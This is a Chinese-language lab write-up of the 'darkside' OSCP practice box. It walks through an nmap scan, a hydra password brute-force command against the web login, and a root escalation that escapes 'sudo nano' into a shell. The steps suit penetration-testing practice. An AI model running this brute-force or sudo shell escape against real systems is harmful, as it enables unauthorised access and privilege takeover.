【OSCP】darkside

admin 2024年5月15日20:31:22评论3 views字数 1542阅读5分8秒阅读模式
【OSCP】darkside

OSCP 靶场

【OSCP】darkside

靶场介绍

darkside

easy

后台爆破、hydra 爆破登录页面、CyberChef加密、凭据收集、nano 提权

信息收集

主机发现

nmap -sn 192.168.31.0/24

【OSCP】darkside

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.166
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-12 07:14 EST
Nmap scan report for 192.168.31.166
Host is up (0.00090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey:
| 3072 e0:25:46:8e:b8:bb:ba:69:69:1b:a7:4d:28:34:04:dd (RSA)
| 256 60:12:04:69:5e:c4:a1:42:2d:2b:51:8a:57:fe:a8:8a (ECDSA)
|_ 256 84:bb:60:b7:79:5d:09:9c:dd:24:23:a3:f2:65:89:3f (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: The DarkSide
MAC Address: 08:00:27:2D:C6:23 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.90 ms 192.168.31.166

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.52 seconds

目录扫描

【OSCP】darkside

扫描到一个backup 目录,访问得到如下提示

【OSCP】darkside

使用里面的账号进行爆破,这里由于burpsuite 加载大字典卡住了,我们直接使用hydra 进行爆破

hydra -l kevin -P /usr/share/wordlists/rockyou.txt 192.168.31.166  http-post-form "/:user=kevin&pass=^PASS^:invalid"

【OSCP】darkside

【OSCP】darkside

登录后得到一串密码,使用https://gchq.github.io/CyberChef 解码后得到访问目录

【OSCP】darkside

访问后,再次获取一个目录。最后访问得到一个账号密码

【OSCP】darkside

【OSCP】darkside

权限获取

【OSCP】darkside

权限提升

通过历史记录提权到rijaba 账号

【OSCP】darkside

通过nano 提权到root

sudo nano
输入^R
然后^X
最后输入:reset; sh 1>&0 2>&0

【OSCP】darkside

【OSCP】darkside

【OSCP】darkside

End

“点赞、在看与分享都是莫大的支持”

【OSCP】darkside

【OSCP】darkside

原文始发于微信公众号(贝雷帽SEC):【OSCP】darkside

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月15日20:31:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】darksidehttps://cn-sec.com/archives/2742229.html

发表评论

匿名网友 填写信息